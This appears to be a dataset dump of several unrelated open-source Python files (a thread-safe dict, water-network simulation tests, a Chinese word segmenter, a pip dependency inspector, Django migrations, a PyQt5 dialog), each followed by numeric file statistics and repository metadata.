def __len__(self):
with self.mutex:
return len(self.data)
def __getitem__(self, key):
with self.mutex:
return self.data.__getitem__(key)
def __setitem__(self, key, item):
with self.mutex:
self.data[key] = item
def __delitem__(self, key):
with self.mutex:
del self.data[key]
def __iter__(self):
raise NotImplementedError(
"Iteration over this class is unlikely to be threadsafe."
)
# Modify __contains__ to work correctly when __missing__ is present
def __contains__(self, key):
with self.mutex:
return key in self.data
# Now, add the methods in dicts but not in MutableMapping
def __repr__(self):
with self.mutex:
return repr(self.data)
def __eq__(self, other):
with self.mutex:
if isinstance(other, ThreadSafeDict):
with other.mutex:
return self.data == other.data
else:
return self.data == other
def __or__(self, other):
with self.mutex:
if isinstance(other, ThreadSafeDict):
with other.mutex:
return self.__class__(self.data | other.data)
if isinstance(other, dict):
return self.__class__(self.data | other)
return NotImplemented
def __ror__(self, other):
with self.mutex:
if isinstance(other, ThreadSafeDict):
with other.mutex:
return self.__class__(other.data | self.data)
if isinstance(other, dict):
return self.__class__(other | self.data)
return NotImplemented
def __ior__(self, other):
with self.mutex:
if isinstance(other, ThreadSafeDict):
with other.mutex:
self.data |= other.data
else:
self.data |= other
return self
def __copy__(self):
with self.mutex:
inst = self.__class__.__new__(self.__class__)
inst.__dict__.update(self.__dict__)
# Create a copy and avoid triggering descriptors
inst.__dict__["data"] = self.__dict__["data"].copy()
return inst
def get(self, key, default=None):
with self.mutex:
return self.data.get(key, default)
__marker = object()
def pop(self, key, default=__marker):
with self.mutex:
if default is self.__marker:
return self.data.pop(key)
else:
return self.data.pop(key, default)
def clear(self):
with self.mutex:
self.data.clear()
def popitem(self):
with self.mutex:
return self.data.popitem()
def update(self, other=(), /, **kwds):
with self.mutex:
if isinstance(other, ThreadSafeDict):
with other.mutex:
self.data.update(other.data)
else:
self.data.update(other)
def setdefault(self, key, default=None):
with self.mutex:
return self.data.setdefault(key, default)
# WARN: not performant
def keys(self):
with self.mutex:
return list(self.data.keys())
# WARN: not performant
def items(self):
with self.mutex:
return list(self.data.items())
# WARN: not performant
def values(self):
return list(self.data.values())
def copy(self):
with self.mutex:
if self.__class__ is ThreadSafeDict:
return ThreadSafeDict(self.data.copy())
import copy
data = self.data
try:
self.data = {}
c = copy.copy(self)
finally:
self.data = data
c.update(self)
return c
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
| 27.431694 | 71 | 0.551195 | 549 | 5,020 | 4.786885 | 0.205829 | 0.091324 | 0.098935 | 0.065068 | 0.392694 | 0.297945 | 0.236682 | 0.236682 | 0.179604 | 0.179604 | 0 | 0.000618 | 0.355378 | 5,020 | 182 | 72 | 27.582418 | 0.811496 | 0.063944 | 0 | 0.330935 | 0 | 0 | 0.021994 | 0.006193 | 0 | 0 | 0 | 0 | 0 | 1 | 0.201439 | false | 0 | 0.035971 | 0.014388 | 0.467626 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42de2c67ea39fb1c4011156619ee111bdbf7f161 | 4,596 | py | Python | wntr/tests/test_times.py | yejustme/WNTR | 4228853c84217392b57e99c486e878ddf7959bbd | [
"BSD-3-Clause"
] | null | null | null | wntr/tests/test_times.py | yejustme/WNTR | 4228853c84217392b57e99c486e878ddf7959bbd | [
"BSD-3-Clause"
] | null | null | null | wntr/tests/test_times.py | yejustme/WNTR | 4228853c84217392b57e99c486e878ddf7959bbd | [
"BSD-3-Clause"
] | null | null | null | import unittest
from os.path import abspath, dirname, join
testdir = dirname(abspath(str(__file__)))
test_datadir = join(testdir,'networks_for_testing')
ex_datadir = join(testdir,'..','..','examples','networks')
#class TestNetworkTimeWarnings(unittest.TestCase):
#
# @classmethod
# def setUpClass(self):
# import wntr
# self.wntr = wntr
#
# @classmethod
# def tearDownClass(self):
# pass
#
# def test_pattern_start_time(self):
# inp_file = join(test_datadir, 'net_test_8.inp')
# wn = self.wntr.network.WaterNetworkModel()
# parser = self.wntr.network.ParseWaterNetwork()
#
# flag = False
# with warnings.catch_warnings(record=True) as w:
# warnings.simplefilter("always")
# parser.read_inp_file(wn, inp_file)
# for message in w:
# if str(message.message) == 'Currently, only the EpanetSimulator supports a non-zero patern start time.':
# flag = True
# self.assertEqual(flag, True)
#
# #def test_report_time_step(self):
# # inp_file = join(test_datadir, 'net_test_9.inp')
# # wn = self.wntr.network.WaterNetworkModel()
# # parser = self.wntr.network.ParseWaterNetwork()
# #
# # flag = False
# # with warnings.catch_warnings(record=True) as w:
# # warnings.simplefilter("always")
# # parser.read_inp_file(wn, inp_file)
# # for message in w:
# # if str(message.message) == 'Currently, only a the EpanetSimulator supports a report timestep that is not equal to the hydraulic timestep.':
# # flag = True
# # self.assertEqual(flag, True)
#
# def test_report_start_time(self):
# inp_file = join(test_datadir, 'net_test_10.inp')
# wn = self.wntr.network.WaterNetworkModel()
# parser = self.wntr.network.ParseWaterNetwork()
#
# flag = False
# with warnings.catch_warnings(record=True) as w:
# warnings.simplefilter("always")
# parser.read_inp_file(wn, inp_file)
# for message in w:
# if str(message.message) == 'Currently, only the EpanetSimulator supports a non-zero report start time.':
# flag = True
# self.assertEqual(flag, True)
#
# def test_start_clocktime(self):
# inp_file = join(test_datadir, 'net_test_11.inp')
# wn = self.wntr.network.WaterNetworkModel()
# parser = self.wntr.network.ParseWaterNetwork()
#
# flag = False
# with warnings.catch_warnings(record=True) as w:
# warnings.simplefilter("always")
# parser.read_inp_file(wn, inp_file)
# for message in w:
# if str(message.message) == 'Currently, only the EpanetSimulator supports a start clocktime other than 12 am.':
# flag = True
# self.assertEqual(flag, True)
class TestNetworkTimeBehavior(unittest.TestCase):
@classmethod
def setUpClass(self):
import wntr
self.wntr = wntr
inp_file = join(test_datadir, 'times.inp')
wn = self.wntr.network.WaterNetworkModel(inp_file)
sim = self.wntr.sim.WNTRSimulator(wn)
self.results = sim.run_sim()
@classmethod
def tearDownClass(self):
pass
def test_duration(self):
results = self.results
self.assertEqual(len(results.node['head'].index), 26)
self.assertEqual(results.node['head'].index[25], 24*3600+3*3600+5*60)
def test_report_timestep(self):
results = self.results
self.assertEqual((results.node['head'].index[1] - results.node['head'].index[0]), 1*3600+5*60)
def test_pattern_timestep(self):
results = self.results
for t in results.node['demand'].index:
self.assertEqual(results.node['demand'].at[t, 'junction1'], 1.0)
total_seconds = t
if (total_seconds/3900.0)%8 == 0.0 or ((total_seconds/3900.0)-1)%8 == 0.0:
self.assertEqual(results.node['demand'].at[t, 'junction2'], 0.5)
elif (total_seconds/3900.0)%8 == 2.0 or ((total_seconds/3900.0)-1)%8 == 2.0:
self.assertEqual(results.node['demand'].at[t, 'junction2'], 1.0)
elif (total_seconds/3900.0)%8 == 4.0 or ((total_seconds/3900.0)-1)%8 == 4.0:
self.assertEqual(results.node['demand'].at[t, 'junction2'], 1.5)
elif (total_seconds/3900.0)%8 == 6.0 or ((total_seconds/3900.0)-1)%8 == 6.0:
self.assertEqual(results.node['demand'].at[t, 'junction2'], 1.0)
if __name__ == '__main__':
unittest.main()
| 39.62069 | 153 | 0.613795 | 567 | 4,596 | 4.839506 | 0.204586 | 0.035714 | 0.049198 | 0.049563 | 0.787172 | 0.748542 | 0.668732 | 0.608601 | 0.552478 | 0.517857 | 0 | 0.034523 | 0.25 | 4,596 | 115 | 154 | 39.965217 | 0.761532 | 0.546997 | 0 | 0.179487 | 0 | 0 | 0.076885 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 1 | 0.128205 | false | 0.025641 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42e345f904e2768c1e66e371528c325498939f5e | 1,069 | py | Python | snownlp/seg/seg.py | wuxqing/snownlp | 4595942d042c3fb36d187787cdb021ad1fd935e8 | [
"MIT"
] | 1 | 2020-08-04T07:56:12.000Z | 2020-08-04T07:56:12.000Z | snownlp/seg/seg.py | wuxqing/snownlp | 4595942d042c3fb36d187787cdb021ad1fd935e8 | [
"MIT"
] | null | null | null | snownlp/seg/seg.py | wuxqing/snownlp | 4595942d042c3fb36d187787cdb021ad1fd935e8 | [
"MIT"
] | 1 | 2020-07-01T08:28:39.000Z | 2020-07-01T08:28:39.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import codecs
from ..utils.tnt import TnT
class Seg(object):
def __init__(self):
self.segger = TnT()
def save(self, fname):
self.segger.save(fname)
def load(self, fname):
self.segger.load(fname)
def train(self, file_name):
fr = codecs.open(file_name, 'r', 'utf-8')
data = []
for i in fr:
line = i.strip()
if not line:
continue
tmp = map(lambda x: x.split('/'), line.split())
data.append(tmp)
fr.close()
self.segger.train(data)
def seg(self, sentence):
ret = self.segger.tag(sentence)
tmp = ''
for i in ret:
if i[1] == 's':
yield i[0]
elif i[1] == 'e':
yield tmp+i[0]
tmp = ''
else:
tmp += i[0]
if __name__ == '__main__':
seg = Seg()
seg.train('data.txt')
print ' '.join(seg.seg('主要是用来放置一些简单快速的中文分词和词性标注的程序'))
| 21.38 | 59 | 0.4855 | 130 | 1,069 | 3.846154 | 0.446154 | 0.1 | 0.052 | 0.076 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010463 | 0.374181 | 1,069 | 49 | 60 | 21.816327 | 0.736921 | 0.019645 | 0 | 0.055556 | 0 | 0 | 0.049713 | 0.024857 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.083333 | null | null | 0.027778 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42e7de5abf0cb7b8ecb2c1b6a7920c0669cee2e7 | 7,130 | py | Python | src/main/resources/pip-inspector.py | antontroshin/synopsys-detect | 3ae9aaee5f98a7ebf8bda615603ba5ba25f13424 | [
"Apache-2.0"
] | 91 | 2019-02-28T19:10:32.000Z | 2022-03-17T18:56:53.000Z | src/main/resources/pip-inspector.py | antontroshin/synopsys-detect | 3ae9aaee5f98a7ebf8bda615603ba5ba25f13424 | [
"Apache-2.0"
] | 360 | 2019-02-25T20:08:58.000Z | 2022-02-02T17:50:12.000Z | src/main/resources/pip-inspector.py | antontroshin/synopsys-detect | 3ae9aaee5f98a7ebf8bda615603ba5ba25f13424 | [
"Apache-2.0"
] | 53 | 2019-02-15T19:38:56.000Z | 2022-03-31T06:37:49.000Z | # pylint: disable=fixme, line-too-long, import-error, no-name-in-module
#
# Copyright (c) 2020 Synopsys, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
# Uncomment for debugging. Can't use localhost.
# See: https://www.jetbrains.com/help/pycharm/remote-debugging-with-product.html#remote-debug-config
# import pydevd_pycharm
# pydevd_pycharm.settrace('<Host IP Address>', port=5002, stdoutToServer=True, stderrToServer=True)
"""
A script that inspects the pip cache to determine the hierarchy of dependencies
Usage: pip-inspector.py --projectname=<project_name> --requirements=<requirements_path>
"""
from getopt import getopt, GetoptError
from os import path
import sys
from re import split
from pkg_resources import working_set, Requirement
import pip
pip_major_version = int(pip.__version__.split(".")[0])
if pip_major_version >= 20:
from pip._internal.req import parse_requirements
from pip._internal.network.session import PipSession
elif pip_major_version >= 10:
from pip._internal.req import parse_requirements
from pip._internal.download import PipSession
else:
from pip.req import parse_requirements
from pip.download import PipSession
def main():
"""Handles commandline args, executes the inspector, and prints the resulting dependency tree"""
try:
opts, __ = getopt(sys.argv[1:], 'p:r:', ['projectname=', 'requirements='])
except GetoptError as error:
print(str(error))
print('integration-pip-inspector.py --projectname=<project_name> --requirements=<requirements_path>')
sys.exit(2)
project_name = None
requirements_path = None
for opt, arg in opts:
if opt in ('-p', '--projectname'):
project_name = arg
elif opt in ('-r', '--requirements'):
requirements_path = arg
project_dependency_node = resolve_project_node(project_name)
if requirements_path is not None:
try:
assert path.exists(requirements_path), ("The requirements file %s does not exist." % requirements_path)
populate_dependency_tree(project_dependency_node, requirements_path)
except AssertionError:
print('r?' + requirements_path)
print(project_dependency_node.render())
def resolve_project_node(project_name):
"""Attempts to resolve the root DependencyNode from the user provided --projectname argument.
If it can't, produces a DependencyNode with name 'n?' and version 'v?'"""
project_dependency_node = None
if project_name is not None:
project_dependency_node = recursively_resolve_dependencies(project_name, [])
if project_dependency_node is None:
project_dependency_node = DependencyNode('n?', 'v?')
return project_dependency_node
def populate_dependency_tree(project_root_node, requirements_path):
"""Resolves the dependencies of the user-provided requirements.txt and appends them to the dependency tree"""
try:
# This line is pretty much the only reason why we call the internal pip APIs anymore. We should consider if we
# can do this with a more generalized approach.
# --rotte DEC 2020
parsed_requirements = parse_requirements(requirements_path, session=PipSession())
for parsed_requirement in parsed_requirements:
package_name = None
# In 20.1 of pip, the requirements object changed
if hasattr(parsed_requirement, 'req'):
package_name = parsed_requirement.req.name
if package_name is None:
# Comparators from: https://www.python.org/dev/peps/pep-0508/#grammar
# (Last updated November 2020)
#
# re matches from left to right, so subsets (e.g. ===) should be before supersets (e.g. ==)
# See: https://docs.python.org/3/library/re.html
# --rotte NOV 2020
package_name = split('===|<=|!=|==|>=|~=|<|>', parsed_requirement.requirement)[0]
dependency_node = recursively_resolve_dependencies(package_name, [])
if dependency_node is not None:
project_root_node.children = project_root_node.children + [dependency_node]
else:
print('--' + package_name)
except:
print('p?' + requirements_path)
def recursively_resolve_dependencies(package_name, history):
"""Forms a DependencyNode by recursively resolving its dependencies. Tracks history for cyclic dependencies."""
package = get_package_by_name(package_name)
if package is None:
return None
dependency_node = DependencyNode(package.project_name, package.version)
if package_name.lower() not in history:
for package_dependency in package.requires():
child_node = recursively_resolve_dependencies(package_dependency.key, history + [package_name.lower()])
if child_node is not None:
dependency_node.children = dependency_node.children + [child_node]
return dependency_node
def get_package_by_name(package_name):
"""Looks up a package from the pip cache"""
if package_name is None:
return None
package_dict = working_set.by_key
try:
# TODO: By using pkg_resources.Requirement.parse to get the correct key, we may not need to attempt the other
# methods. Robust tests are needed to confirm.
return package_dict[Requirement.parse(package_name).key]
except:
pass
name_variants = (package_name, package_name.lower(), package_name.replace('-', '_'), package_name.replace('_', '-'))
for name_variant in name_variants:
if name_variant in package_dict:
return package_dict[name_variant]
return None
class DependencyNode(object):
"""Represents a python dependency in a tree graph with a name, version, and array of children DependencyNodes"""
def __init__(self, name, version):
self.name = name
self.version = version
self.children = []
def render(self, layer=1):
"""Recursively builds a dependency tree string to be printed to the commandline"""
result = self.name + "==" + self.version
for child in self.children:
result += "\n" + (" " * 4 * layer)
result += child.render(layer + 1)
return result
if __name__ == '__main__':
main()
| 38.333333 | 120 | 0.692146 | 901 | 7,130 | 5.310766 | 0.322974 | 0.03908 | 0.03511 | 0.016301 | 0.126228 | 0.068339 | 0.050157 | 0.050157 | 0.050157 | 0.023406 | 0 | 0.007721 | 0.218934 | 7,130 | 185 | 121 | 38.540541 | 0.851499 | 0.364095 | 0 | 0.153061 | 0 | 0 | 0.055069 | 0.025174 | 0 | 0 | 0 | 0.010811 | 0.020408 | 1 | 0.071429 | false | 0.010204 | 0.122449 | 0 | 0.285714 | 0.061224 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42e9d5a929b67332ce2eb90fefc0bfcc96dc7a14 | 3,427 | py | Python | tests/test_imports.py | JunCEEE/hummingbird | 0b1bdf5023b92090f31d9bc857e0854a805cf2cd | [
"BSD-2-Clause"
] | 14 | 2016-02-18T23:10:12.000Z | 2021-07-30T09:19:56.000Z | tests/test_imports.py | JunCEEE/hummingbird | 0b1bdf5023b92090f31d9bc857e0854a805cf2cd | [
"BSD-2-Clause"
] | 66 | 2015-11-18T15:39:45.000Z | 2015-12-06T16:06:20.000Z | tests/test_imports.py | JunCEEE/hummingbird | 0b1bdf5023b92090f31d9bc857e0854a805cf2cd | [
"BSD-2-Clause"
] | 13 | 2016-07-07T13:15:52.000Z | 2021-11-10T11:56:13.000Z | import os, sys
import warnings
__thisdir__ = os.path.dirname(os.path.realpath(__file__))
# Testing the import of the numpy package
def test_import_numpy():
try:
import numpy as np
except ImportError as e:
assert(1 == 0), "Numpy could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the scipy package
def test_import_scipy():
try:
import scipy as sp
except ImportError as e:
assert(1 == 0), "Scipy could not be imported:\n %s" %e
sys.path.pop(0)
# Testing for broken MPI installation
def test_import_mpi4py():
try:
from mpi4py import MPI
except ImportError:
warnings.warn(UserWarning("MPI for python could not be imported"))
assert(1 == 1)
sys.path.pop(0)
# Testing the import of the Qt modules QtGui and QtCore
def test_import_qt_modules():
sys.path.insert(0, __thisdir__ + "/../src")
try:
from interface.Qt import QtGui, QtCore
except ImportError as e:
assert (1 == 0), "The Qt modules QtGui and QtCore could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the pyqtgraph module
def test_import_pyqtgraph_module():
try:
import pyqtgraph
except ImportError:
assert (1 == 0), "The pyqtgraph module could not be imported"
sys.path.pop(0)
# Testimg the import of the interface module
def test_import_interface_module():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import interface
except ImportError as e:
assert (1 == 0), "The interface module could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the ipc module
def test_import_ipc_module():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import ipc
except ImportError as e:
assert (1 == 0), "The ipc module could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the plotting module
def test_import_plotting_module():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import plotting
except ImportError as e:
assert (1 == 0), "The plotting module could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the analysis module
def test_import_analysis_module():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import analysis
except ImportError as e:
assert (1 == 0), "The analysis module could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the simulation module
def test_import_simulation_module():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import simulation
except ImportError as e:
assert (1 == 0), "The simulation module could not be imported:\n %s" %e
sys.path.pop(0)
# Testing the import of the utils module
def test_import_utils_module():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import utils
except ImportError as e:
assert (1 == 0), "The utils module could not be imported:\n %s" %e
sys.path.pop(0)
# Testing if LCLS backend is imported properly
def test_import_backend_lcls():
sys.path.insert(0, __thisdir__ + "/../src")
try:
import backend.lcls
return True
except ImportError as e:
warnings.warn(UserWarning("The LCLS backend could not be imported:\n %s" %e))
assert(1 == 1)
return False
sys.path.pop(0)
| 30.061404 | 89 | 0.646046 | 501 | 3,427 | 4.273453 | 0.133733 | 0.06539 | 0.072863 | 0.100887 | 0.558617 | 0.537599 | 0.516114 | 0.467539 | 0.350771 | 0.22653 | 0 | 0.017864 | 0.248614 | 3,427 | 113 | 90 | 30.327434 | 0.813592 | 0.147067 | 0 | 0.528736 | 0 | 0 | 0.199381 | 0 | 0 | 0 | 0 | 0 | 0.137931 | 1 | 0.137931 | false | 0 | 0.574713 | 0 | 0.735632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
42ec24b596da19ef3e315c639b3ed58207a9f443 | 572 | py | Python | hostmanager/migrations/0002_auto_20170929_2313.py | kingsdigitallab/devops-django | faaa58a413d3e763c82ccd7a27a1bd27586fe9dd | [
"MIT"
] | 1 | 2020-08-20T07:00:14.000Z | 2020-08-20T07:00:14.000Z | hostmanager/migrations/0002_auto_20170929_2313.py | kingsdigitallab/devops-django | faaa58a413d3e763c82ccd7a27a1bd27586fe9dd | [
"MIT"
] | 1 | 2017-09-29T22:26:35.000Z | 2019-09-18T03:28:20.000Z | hostmanager/migrations/0002_auto_20170929_2313.py | kingsdigitallab/devops-django | faaa58a413d3e763c82ccd7a27a1bd27586fe9dd | [
"MIT"
] | 2 | 2018-01-04T16:45:53.000Z | 2019-10-02T15:35:32.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-29 22:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('hostmanager', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='server',
name='ip',
field=models.CharField(blank=True, help_text='Will be automatically populated if the domain is registered.', max_length=255, null=True, verbose_name='IP Address'),
),
]
| 27.238095 | 182 | 0.63986 | 67 | 572 | 5.313433 | 0.835821 | 0.033708 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 0.244755 | 572 | 20 | 183 | 28.6 | 0.768519 | 0.118881 | 0 | 0 | 1 | 0 | 0.215569 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.384615 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42ef2e1738628cd3478c798c40aeb644a4edd094 | 1,506 | py | Python | wagtail/search/migrations/0005_create_indexentry.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | 1 | 2022-02-09T05:25:30.000Z | 2022-02-09T05:25:30.000Z | wagtail/search/migrations/0005_create_indexentry.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | wagtail/search/migrations/0005_create_indexentry.py | stevedya/wagtail | 52e5abfe62547cdfd90ea7dfeb8bf5a52f16324c | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 3.2.4 on 2021-06-28 14:12
import django.db.models.deletion # noqa
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("contenttypes", "0002_remove_content_type_name"),
("wagtailsearch", "0004_querydailyhits_verbose_name_plural"),
]
operations = [
migrations.CreateModel(
name="IndexEntry",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("object_id", models.CharField(max_length=50)),
("title_norm", models.FloatField(default=1.0)),
(
"content_type",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="+",
to="contenttypes.contenttype",
),
),
],
options={
"verbose_name": "index entry",
"verbose_name_plural": "index entries",
"abstract": False,
},
),
migrations.AlterUniqueTogether(
name="indexentry",
unique_together={("content_type", "object_id")},
),
]
| 30.12 | 69 | 0.458831 | 113 | 1,506 | 5.911504 | 0.628319 | 0.065868 | 0.041916 | 0.065868 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.031877 | 0.437583 | 1,506 | 49 | 70 | 30.734694 | 0.756789 | 0.033201 | 0 | 0.142857 | 1 | 0 | 0.176875 | 0.063317 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.047619 | 0 | 0.119048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42f46e7b9f4ed5fd9e45b9b941cd383196bd9585 | 2,945 | py | Python | ui/ui_designer/ui_file/uic_initDialog.py | Tanyiqu/AnimeArtifactPro | 771eded4c117c7dbd5e5066036dd4ef76783c90a | [
"Apache-2.0"
] | 50 | 2020-04-16T15:21:32.000Z | 2020-10-05T11:56:57.000Z | ui/ui_designer/ui_file/uic_initDialog.py | tanyiqu/AnimeArtifactPro | 771eded4c117c7dbd5e5066036dd4ef76783c90a | [
"Apache-2.0"
] | 2 | 2020-10-23T19:47:59.000Z | 2021-01-25T02:55:00.000Z | ui/ui_designer/ui_file/uic_initDialog.py | Tanyiqu/AnimeArtifactPro | 771eded4c117c7dbd5e5066036dd4ef76783c90a | [
"Apache-2.0"
] | 4 | 2020-04-22T14:25:35.000Z | 2020-06-20T15:26:53.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'initDialog.ui'
#
# Created by: PyQt5 UI code generator 5.14.1
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_initDialog(object):
def setupUi(self, initDialog):
initDialog.setObjectName("initDialog")
initDialog.resize(450, 180)
initDialog.setMinimumSize(QtCore.QSize(450, 180))
initDialog.setMaximumSize(QtCore.QSize(450, 180))
self.txtUserName = QtWidgets.QLineEdit(initDialog)
self.txtUserName.setGeometry(QtCore.QRect(130, 20, 291, 31))
self.txtUserName.setObjectName("txtUserName")
self.lblUserName = QtWidgets.QLabel(initDialog)
self.lblUserName.setGeometry(QtCore.QRect(20, 26, 90, 16))
self.lblUserName.setObjectName("lblUserName")
self.lblPlayerPath = QtWidgets.QLabel(initDialog)
self.lblPlayerPath.setGeometry(QtCore.QRect(20, 69, 156, 16))
self.lblPlayerPath.setObjectName("lblPlayerPath")
self.lblIDMPath = QtWidgets.QLabel(initDialog)
self.lblIDMPath.setGeometry(QtCore.QRect(20, 110, 156, 16))
self.lblIDMPath.setObjectName("lblIDMPath")
self.btnChoosePlayer = QtWidgets.QToolButton(initDialog)
self.btnChoosePlayer.setGeometry(QtCore.QRect(190, 69, 37, 18))
self.btnChoosePlayer.setObjectName("btnChoosePlayer")
self.btnChooseIDM = QtWidgets.QToolButton(initDialog)
self.btnChooseIDM.setGeometry(QtCore.QRect(190, 110, 37, 18))
self.btnChooseIDM.setObjectName("btnChooseIDM")
self.lblPlayer = QtWidgets.QLabel(initDialog)
self.lblPlayer.setGeometry(QtCore.QRect(240, 69, 181, 16))
self.lblPlayer.setObjectName("lblPlayer")
self.lblIDM = QtWidgets.QLabel(initDialog)
self.lblIDM.setGeometry(QtCore.QRect(240, 110, 181, 16))
self.lblIDM.setObjectName("lblIDM")
self.btnFinished = QtWidgets.QPushButton(initDialog)
self.btnFinished.setGeometry(QtCore.QRect(340, 140, 75, 31))
self.btnFinished.setObjectName("btnFinished")
self.retranslateUi(initDialog)
QtCore.QMetaObject.connectSlotsByName(initDialog)
def retranslateUi(self, initDialog):
_translate = QtCore.QCoreApplication.translate
initDialog.setWindowTitle(_translate("initDialog", "做一些初始化"))
self.lblUserName.setText(_translate("initDialog", "用户名(8个字符)"))
self.lblPlayerPath.setText(_translate("initDialog", "播放器路径(可以暂时不选择)"))
self.lblIDMPath.setText(_translate("initDialog", "下载器路径(可以暂时不选择)"))
self.btnChoosePlayer.setText(_translate("initDialog", "..."))
self.btnChooseIDM.setText(_translate("initDialog", "..."))
self.lblPlayer.setText(_translate("initDialog", "无"))
self.lblIDM.setText(_translate("initDialog", "无"))
self.btnFinished.setText(_translate("initDialog", "完成"))
| 48.278689 | 78 | 0.702207 | 295 | 2,945 | 6.972881 | 0.311864 | 0.074866 | 0.096257 | 0.070491 | 0.030141 | 0 | 0 | 0 | 0 | 0 | 0 | 0.046407 | 0.173175 | 2,945 | 60 | 79 | 49.083333 | 0.798357 | 0.062479 | 0 | 0 | 1 | 0 | 0.09114 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042553 | false | 0 | 0.021277 | 0 | 0.085106 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e0198a52c860e5e44813f8e29c44e0fcf1479c4 | 1,199 | py | Python | outbreak_z.py | jonesmat/outbreak_z | aec920e38a18866e83f54975e89c2de67d83f4f8 | [
"MIT"
] | 1 | 2020-08-19T13:23:26.000Z | 2020-08-19T13:23:26.000Z | outbreak_z.py | jonesmat/outbreak_z | aec920e38a18866e83f54975e89c2de67d83f4f8 | [
"MIT"
] | null | null | null | outbreak_z.py | jonesmat/outbreak_z | aec920e38a18866e83f54975e89c2de67d83f4f8 | [
"MIT"
] | null | null | null | import pygame
